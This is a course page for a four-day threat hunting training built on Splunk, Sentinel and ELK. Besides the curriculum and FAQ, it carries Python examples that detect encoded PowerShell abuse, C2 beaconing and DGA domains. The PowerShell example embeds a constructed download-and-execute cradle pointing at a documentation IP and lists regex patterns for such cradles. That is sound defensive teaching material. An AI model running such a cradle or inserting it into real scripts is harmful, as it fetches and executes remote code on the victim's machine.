---
url: "https://xcademia.com/courses/apt-detection-and-advanced-threat-hunting"
title: APT Detection and Advanced Threat Hunting
description: "4-day hands-on threat hunting training using Splunk, Microsoft Sentinel & ELK. MITRE ATT&CK aligned for SOC L2/L3 analysts and threat hunting professionals."
publishedAt: "2026-04-13T06:38:30.039576+00:00"
updatedAt: "2026-04-14T09:58:43.406222+00:00"
type: course
code: "CYB-0158"
level: Practitioner
duration_days: "4"
track: "Cyber Warfare & Advanced Threat Defence"
category: "Cybersecurity & Ethical Hacking"
credential_tier: tier1
price_gbp: "4495"
---

# APT Detection and Advanced Threat Hunting

> A four-day hands-on practitioner programme covering hypothesis-driven threat hunting for nation-state intrusions across Splunk, Microsoft Sentinel, and ELK, with daily lab exercises and a live capstone. Build the detection engineering, hunt methodology, and intelligence reporting skills to find APT actors who have already bypassed standard SIEM alerting.

## Overview

Nation-state actors average 197 days inside a network before detection. Standard SIEM alerts are designed for known-bad indicators, not patient, living-off-the-land operators who use legitimate tools, trusted processes, and compromised credentials. This four-day programme develops the threat hunting capability needed to find what alerts miss, using the same platforms deployed in enterprise and government SOC environments.

Across four days of mentor-led instruction and hands-on platform labs, participants build APT-specific detection rules in Splunk and Microsoft Sentinel, execute structured threat hunts across all three platforms, use MITRE ATT&CK Navigator to map detection coverage and identify gaps by adversary group, and analyse network traffic and DNS patterns for C2 beaconing and other anomaly indicators. Every day concludes with a practical exercise reinforcing the session content.

The programme culminates in a four-hour capstone: a live red-versus-blue hunt scenario using a simulated nation-state intrusion dataset. Participants detect, investigate, and produce a professional intelligence report under realistic time pressure. This course is aligned with MITRE ATT&CK, NCSC threat hunting guidance, and platform-specific SOC detection engineering standards.

## Prerequisites

- Active experience in a SOC analyst or security operations role at L2 level or above.
- Familiarity with at least one SIEM platform and basic query language experience.
- Understanding of common attack techniques including phishing, credential theft, and lateral movement.

## What you will learn

- Hunt for long-dwell nation-state intrusions using Splunk, Microsoft Sentinel, and ELK across four days of hands-on lab work.
- Apply MITRE ATT&CK Navigator to build detection coverage maps and identify gaps by specific adversary group.
- Detect living-off-the-land techniques, LOLBin abuse, fileless malware, and trusted process injection patterns.
- Identify lateral movement, credential dumping, and C2 beaconing signatures across enterprise telemetry.
- Write structured threat hunting hypotheses and execute disciplined, evidence-based hunts to completion.
- Produce professional intelligence reports translating hunt findings into actionable SOC and CISO recommendations.
- Design and prioritise a detection engineering programme based on threat actor likelihood and sector exposure.

## Skills you will gain

- Hypothesis-driven threat hunting methodology
- Splunk SPL for detection engineering
- Microsoft Sentinel KQL query writing
- ELK Stack threat hunting
- MITRE ATT&CK Navigator coverage mapping
- C2 beaconing and DNS anomaly detection
- Living-off-the-land technique detection
- Intelligence report production
- Lateral movement detection
- Hunt library development and documentation
- Cloud intrusion detection
- Supply chain compromise hunting

## Career progression

- Threat Hunter
- SOC L2 Analyst
- SOC L3 Analyst
- Blue Team Lead
- Detection Engineer
- Incident Responder

## Curriculum

1. **Module 1: Getting Ready**
   - Pre-reading: MITRE ATT&CK threat hunting methodology overview and hypothesis framework guide
   - Platform access setup: Splunk trial environment, Sentinel workspace, ELK stack lab configuration
   - Introduction to the hunt hypothesis framework and hunt log documentation standard used throughout
   - Course objectives, skill baseline assessment, and individual learning pathway alignment
2. **Module 2: Why Standard SIEM Misses Nation-State Actors**
   - The 197-day average dwell time: what it means operationally for detection team strategy
   - Alert-driven versus hypothesis-driven detection: why the strategic shift matters for APT hunting
   - How nation-state actors operate inside the detection gap using legitimate tools and trusted accounts
   - Living-off-the-land techniques: why signature-based detection fails against LOLBin abuse
   - Detection engineering fundamentals: signal-to-noise ratio, alert fatigue, and coverage gaps
3. **Module 3: Living-Off-the-Land and Fileless Malware**
   - LOLBins catalogue: the legitimate tools most commonly abused by nation-state actors
   - PowerShell abuse patterns: obfuscation, encoded commands, and remote execution detection
   - WMI subscriptions and scheduled task persistence: detection signatures and hunt queries
   - Fileless malware execution: in-memory payloads, registry persistence, and reflective loading
   - Building behavioural baselines for LOLBin abuse detection in enterprise environments
4. **Module 4: Hunt Hypothesis Development and Planning**
   - Structured hunt planning: translating threat intelligence into a testable, falsifiable hypothesis
   - IoC-based versus TTP-based hunting: why TTP-based hunting discovers more persistent intrusions
   - Writing hunt hypotheses for specific APT group techniques using MITRE ATT&CK as a guide
   - Building and documenting a hunt library for team reuse and programme continuity
   - Hunt prioritisation: focusing effort on highest-risk techniques by adversary likelihood
5. **Module 5: Splunk: APT Detection Rule Building**
   - SPL fundamentals for threat hunting: joins, subsearches, statistical analysis, and lookup tables
   - Building APT-specific detection rules for APT28, APT29, and Volt Typhoon TTPs in Splunk
   - Lateral movement detection using authentication event correlation and process telemetry
   - Credential dumping indicators: LSASS access patterns and Mimikatz behavioural signatures
   - Scheduled search optimisation and alert tuning to reduce false positives without losing coverage
6. **Module 6: Splunk: Network Traffic and DNS Anomaly Hunting**
   - C2 beaconing detection: statistical analysis of outbound connection frequency and regularity
   - Domain generation algorithm identification using entropy analysis and DNS query patterns
   - Statistical baseline construction for DNS and HTTP traffic using Splunk analytics commands
   - Hunting for long-dwell implants using periodic communication timing signatures
   - Lab exercise: hunt for C2 beaconing and DNS anomalies in a simulated enterprise dataset
7. **Module 7: Microsoft Sentinel: KQL and Lateral Movement Detection**
   - KQL query writing for threat hunting: syntax, joins, time-series analysis, and aggregation
   - Lateral movement and credential abuse detection: pass-the-hash, pass-the-ticket, Kerberoasting, and Golden Ticket indicators
   - Credential dumping detection in Microsoft Sentinel log sources: endpoint and identity telemetry
   - Azure AD (now Microsoft Entra ID) and cloud-specific hunting patterns for APT29-style cloud intrusion operations
   - Lab exercise: hunt for lateral movement indicators in a simulated Sentinel workspace
8. **Module 8: Sentinel: ATT&CK Navigator Coverage Mapping**
   - Building a detection coverage map using MITRE ATT&CK Navigator from existing Sentinel rules
   - Mapping analytics rules to specific ATT&CK techniques and identifying coverage gaps by layer
   - Prioritising new detection rule development by adversary group profile and sector likelihood
   - Identifying and documenting detection blind spots for CISO reporting and resource justification
   - Communicating coverage gaps and remediation priorities to SOC leadership and CISO audiences
9. **Module 9: ELK Stack: Threat Hunting Lab**
   - ELK stack architecture overview for threat hunters: Elasticsearch, Logstash, Kibana roles
   - Building hunt dashboards in Kibana for continuous monitoring and anomaly visualisation
   - Writing EQL queries for process event correlation and network anomaly detection
   - Hunting for supply chain intrusion patterns in software deployment and update logs
   - ELK lab exercise: hunt using APT-sourced endpoint and network telemetry dataset
10. **Module 10: Supply Chain and Cloud Intrusion Detection**
   - Detecting SolarWinds-style software supply chain implants in enterprise endpoint and network data
   - Trusted software abuse: detecting signed binary execution used to deliver malicious payloads
   - Cloud-specific lateral movement in AWS and Azure: unusual API calls, role assumption, and data access
   - APT29 Microsoft 365 targeting: detecting cloud intrusion in audit logs and sign-in data
   - Combined hunt scenario: identify a supply chain compromise from mixed log source dataset
11. **Module 11: Advanced TTP Analysis: Volt Typhoon and APT41**
   - Volt Typhoon living-off-the-land hunting: LOTL detection in OT-adjacent and industrial environments
   - APT41 dual-use operations: hunting indicators that distinguish espionage from ransomware pre-positioning
   - Long-dwell persistence mechanisms: scheduled tasks, WMI subscriptions, and registry run key analysis
   - Exfiltration detection: identifying slow, low-volume data theft over DNS, HTTPS, and cloud storage
   - Combined hunt exercise: apply both actor profiles to a live enterprise dataset and document findings
12. **Module 12: Intelligence Report Production**
   - Translating hunt findings into structured, actionable intelligence products for SOC and CISO audiences
   - Professional hunt report format: evidence chain, confidence levels, and recommended next actions
   - Briefing executive stakeholders on APT hunt findings without unnecessary technical complexity
   - Handoff documentation for incident response teams when a hunt becomes an active investigation
   - Building and maintaining a documented hunt programme library for continuous SOC improvement
13. **Module 13: Capstone: Live Nation-State Hunt Exercise**
   - Four-hour live red-versus-blue hunt using a simulated nation-state intrusion dataset across all three platforms
   - Participants detect, investigate, and attribute the simulated intrusion independently within the time window
   - Produce a complete professional intelligence report including findings, confidence levels, and recommendations
   - Full instructor debrief: methodology review, missed indicators, false positive analysis, and improvement plan
   - Peer review of intelligence reports: structured feedback on analytical quality and reporting standard
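Module 3 covers the encoded-command pattern behind much LOLBin abuse: `powershell -EncodedCommand` takes a base64 blob of the script encoded as UTF-16LE, and PowerShell accepts any unambiguous prefix of the switch (`-e`, `-ec`, `-enc`, ...), so a hunt has to decode before it can inspect. The Python below is an added example, not course material or any vendor's code: it decodes and triages constructed process-creation records shaped like Sysmon Event ID 1. The hostnames, parent-process watchlist, indicator list and scoring weights are assumptions for illustration.

```python
"""Added example (not course material): decode and triage PowerShell -EncodedCommand
abuse in process-creation telemetry, the Module 3 'encoded commands' pattern.
Records mimic Sysmon Event ID 1 fields but are constructed for illustration, as are
the indicator list, the parent-process watchlist and the scoring weights."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so capture every "-<letters> <base64 blob>" pair and test the prefix in code.
SWITCH_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{16,})")

# Behaviours worth a second look, checked on the outer command line and the decoded script.
INDICATORS = [
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("download-cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)),
    ("nested-base64", re.compile(r"frombase64string", re.I)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no-profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("policy-bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
]
# Office and script hosts rarely have a legitimate reason to spawn PowerShell (assumed watchlist).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an -EncodedCommand blob, else None.
    PowerShell encodes the script as UTF-16LE before base64, so decode in that order."""
    for switch, blob in SWITCH_RE.findall(cmdline):
        if not "encodedcommand".startswith(switch.lower()):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (binascii.Error, ValueError):
            return None  # looks like a blob but is not valid UTF-16LE base64


def triage(record):
    """Score one process-creation record; higher means hunt it first."""
    cmdline = record["command_line"]
    decoded = decode_encoded_command(cmdline)
    # Search the switches and the decoded script, not the opaque base64 text itself.
    haystack = SWITCH_RE.sub(r" -\1 <base64>", cmdline) + "\n" + (decoded or "")
    indicators = [name for name, rx in INDICATORS if rx.search(haystack)]
    parent = record["parent_image"].rsplit("\\", 1)[-1].lower()
    parent_suspicious = parent in SUSPICIOUS_PARENTS
    score = (1 if decoded is not None else 0) + 2 * len(indicators) + (3 if parent_suspicious else 0)
    return {"host": record["host"], "parent": parent, "decoded": decoded,
            "indicators": indicators, "parent_suspicious": parent_suspicious, "score": score}


def to_encoded_command(script):
    """Encode a script the way `powershell -EncodedCommand` expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed payloads; the cradle points at an RFC 5737 documentation address.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
ADMIN_SCRIPT = "Get-ChildItem C:\\Logs -Filter *.bak | Remove-Item -Force"

# Constructed records: a macro-spawned cradle, a plain admin run, and an encoded but benign task.
RECORDS = [
    {"host": "WS-0142", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {to_encoded_command(CRADLE)}"},
    {"host": "WS-0077", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"host": "SRV-FS01", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoProfile -EncodedCommand {to_encoded_command(ADMIN_SCRIPT)}"},
]


def run_hunt(records):
    """Triage every record and return them most-suspicious first."""
    return sorted((triage(r) for r in records), key=lambda t: t["score"], reverse=True)


if __name__ == "__main__":
    for t in run_hunt(RECORDS):
        print(f"[{t['score']:2d}] {t['host']} parent={t['parent']} indicators={t['indicators']}")
        if t["decoded"]:
            print("      decoded:", t["decoded"])
```

The third record is the tuning lesson: scheduled tasks and management agents legitimately use `-EncodedCommand`, so the encoding alone is weak signal; what separates the macro-spawned cradle is the combination of an Office parent, a hidden window and a download-and-execute pattern in the decoded text. Keep the decoded script in the alert payload so the analyst never has to decode by hand.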
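Module 6 names two statistical hunts, beacon regularity and DGA entropy, without showing the arithmetic. As an added example that is not part of the course materials, the Python below runs both over constructed connection and DNS records: beaconing is scored by the coefficient of variation of inter-arrival times per source/destination pair, and DGA activity by the Shannon entropy of the registrable label combined with NXDOMAIN responses. The hosts, domains, timestamps and thresholds (CV ≤ 0.1, label length ≥ 12, entropy ≥ 3.5 bits, 3 hits) are assumptions for illustration.

```python
"""Added example (not course material): two Module 6 hunts over constructed telemetry.

1. C2 beaconing: group outbound connections by (src, dst), take the inter-arrival
   times and flag pairs whose coefficient of variation (stdev / mean) is low, i.e.
   the implant calls home on a near-fixed timer.
2. DGA hunting: score each DNS query's registrable label by Shannon entropy and
   flag hosts that resolve several long, high-entropy labels to NXDOMAIN.
All records, hosts and thresholds below are invented for illustration.
"""
import math
import statistics
from collections import Counter, defaultdict
from datetime import datetime

# Constructed proxy/firewall records: (ISO-8601 timestamp, source host, destination).
CONNECTIONS = [
    # 10.0.0.5 -> 203.0.113.7 roughly every 60 s with +/-1 s jitter: beacon-like.
    ("2026-03-01T09:00:00+00:00", "10.0.0.5", "203.0.113.7"),
    ("2026-03-01T09:01:00+00:00", "10.0.0.5", "203.0.113.7"),
    ("2026-03-01T09:02:01+00:00", "10.0.0.5", "203.0.113.7"),
    ("2026-03-01T09:03:00+00:00", "10.0.0.5", "203.0.113.7"),
    ("2026-03-01T09:04:01+00:00", "10.0.0.5", "203.0.113.7"),
    ("2026-03-01T09:05:00+00:00", "10.0.0.5", "203.0.113.7"),
    ("2026-03-01T09:05:59+00:00", "10.0.0.5", "203.0.113.7"),
    ("2026-03-01T09:07:00+00:00", "10.0.0.5", "203.0.113.7"),
    # 10.0.0.9 -> 198.51.100.20: bursty, human-driven browsing pattern.
    ("2026-03-01T09:00:00+00:00", "10.0.0.9", "198.51.100.20"),
    ("2026-03-01T09:00:05+00:00", "10.0.0.9", "198.51.100.20"),
    ("2026-03-01T09:00:47+00:00", "10.0.0.9", "198.51.100.20"),
    ("2026-03-01T09:02:00+00:00", "10.0.0.9", "198.51.100.20"),
    ("2026-03-01T09:02:08+00:00", "10.0.0.9", "198.51.100.20"),
    ("2026-03-01T09:06:40+00:00", "10.0.0.9", "198.51.100.20"),
    ("2026-03-01T09:15:05+00:00", "10.0.0.9", "198.51.100.20"),
]

# Constructed DNS records: (source host, query name, response code).
DNS_QUERIES = [
    ("10.0.0.9", "www.microsoft.com", "NOERROR"),
    ("10.0.0.9", "update.windowsupdate.com", "NOERROR"),
    ("10.0.0.9", "cdn.example.org", "NOERROR"),
    ("10.0.0.5", "xk3j9q2mzv7wplt.biz", "NXDOMAIN"),
    ("10.0.0.5", "qpz8vr1kdn4ytx.info", "NXDOMAIN"),
    ("10.0.0.5", "mw2xq7vbkz9rtplf.net", "NXDOMAIN"),
    ("10.0.0.5", "www.microsoft.com", "NOERROR"),
]


def find_beacons(records, min_count=6, max_cv=0.1):
    """Return (src, dst) pairs whose inter-arrival times are suspiciously regular."""
    by_pair = defaultdict(list)
    for ts, src, dst in records:
        by_pair[(src, dst)].append(datetime.fromisoformat(ts).timestamp())
    hits = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_count:  # too few samples to call anything periodic
            continue
        times.sort()
        deltas = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(deltas)
        if mean <= 0:
            continue
        cv = statistics.stdev(deltas) / mean  # 0 = perfect clock, >1 = bursty
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "count": len(times),
                         "interval_s": round(mean, 1), "cv": round(cv, 3)})
    return hits


def shannon_entropy(text):
    """Bits of entropy per character of the string."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registrable_label(fqdn):
    """Label left of the public suffix. Assumes a single-label TLD (.com, .biz);
    a real hunt would use the Public Suffix List so 'bbc.co.uk' yields 'bbc'."""
    parts = fqdn.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def find_dga_suspects(dns_records, min_len=12, min_entropy=3.5, min_hits=3):
    """Hosts with >= min_hits NXDOMAIN answers for long, high-entropy labels."""
    suspects = defaultdict(list)
    for src, qname, rcode in dns_records:
        label = registrable_label(qname)
        if rcode == "NXDOMAIN" and len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            suspects[src].append(label)
    return {src: labels for src, labels in suspects.items() if len(labels) >= min_hits}


if __name__ == "__main__":
    for hit in find_beacons(CONNECTIONS):
        print(f"beacon? {hit['src']} -> {hit['dst']} every {hit['interval_s']}s (cv={hit['cv']})")
    for src, labels in find_dga_suspects(DNS_QUERIES).items():
        print(f"DGA? {src} resolved {len(labels)} high-entropy NXDOMAINs: {labels}")
```

Two caveats a hunter should carry into the platform labs. Implants with heavy randomised jitter push the coefficient of variation above a fixed cutoff, so pair the CV test with a long-window count of connections to rare destinations rather than relying on it alone. Entropy is also a blunt instrument: long legitimate CDN and telemetry hostnames can score above 3.5 bits, which is why the DGA check here requires NXDOMAIN responses and several hits per host before it fires, and why a production version would add dictionary or n-gram scoring. In Splunk the same beacon calculation is a per-pair `streamstats` over consecutive `_time` values followed by `stats avg` and `stdev` of the delta.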

## Exam & certification

You will receive an Xcademia certificate of completion based on participation and successful completion of labs and scenario simulations.

## Delivery options

- **Live Online** — Join live instructor-led sessions from anywhere. Interactive, engaging, and flexible.
- **Onsite Training** — We come to you. Training delivered at your workplace for teams of 6 or more.
- **Venue-Based** — Classroom training at a professional venue. Ideal for focused, immersive learning.
- **Blended** — Combine online and in-person learning for maximum flexibility and impact.

## Frequently asked questions

**What SIEM experience do I need before attending?**

Familiarity with at least one SIEM platform and basic query writing is expected. Participants do not need expertise across all three platforms, as each is taught from a hunting-focused foundation within the programme.

**How current is the threat actor and campaign content?**

Content is updated continuously. Case studies and hunt datasets reflect current 2025-2026 campaign activity from major APT groups including Volt Typhoon, APT29, APT41, and Lazarus.

**Will I have access to lab platforms after the course?**

Lab access is provided for the duration of the programme. Participants receive guidance on setting up equivalent personal environments for continued practice after completion.

**What do I leave with?**

An Xcademia certificate of completion, a completed capstone hunt intelligence report, a documented ATT&CK coverage map for your environment, and a personal hunt library developed across the four days.

**Does this course need an exam?**

No. Assessment is through the platform labs and the four-hour capstone hunt. Completion requires full attendance and successful delivery of the capstone intelligence report.

## Course at a glance

| Field | Value |
| --- | --- |
| Code | CYB-0158 |
| Duration | 4 days |
| Level | Practitioner |
| Track | Cyber Warfare & Advanced Threat Defence |
| Category | Cybersecurity & Ethical Hacking |
| Credential tier | tier1 |
| Price (GBP) | £4495 |

---

## About this content

This Markdown course profile is the citation-grade twin of [APT Detection and Advanced Threat Hunting](https://xcademia.com/courses/apt-detection-and-advanced-threat-hunting). It is published by **Xcademia** (UK Companies House 12322710) and is available for AI search engines and large language models to index, summarise, and cite.

When citing or quoting, please attribute *Xcademia* and link back to the source URL above.

- Source: https://xcademia.com/courses/apt-detection-and-advanced-threat-hunting
- Publisher: Xcademia — https://xcademia.com
- Catalogue index: https://xcademia.com/llms-full.txt
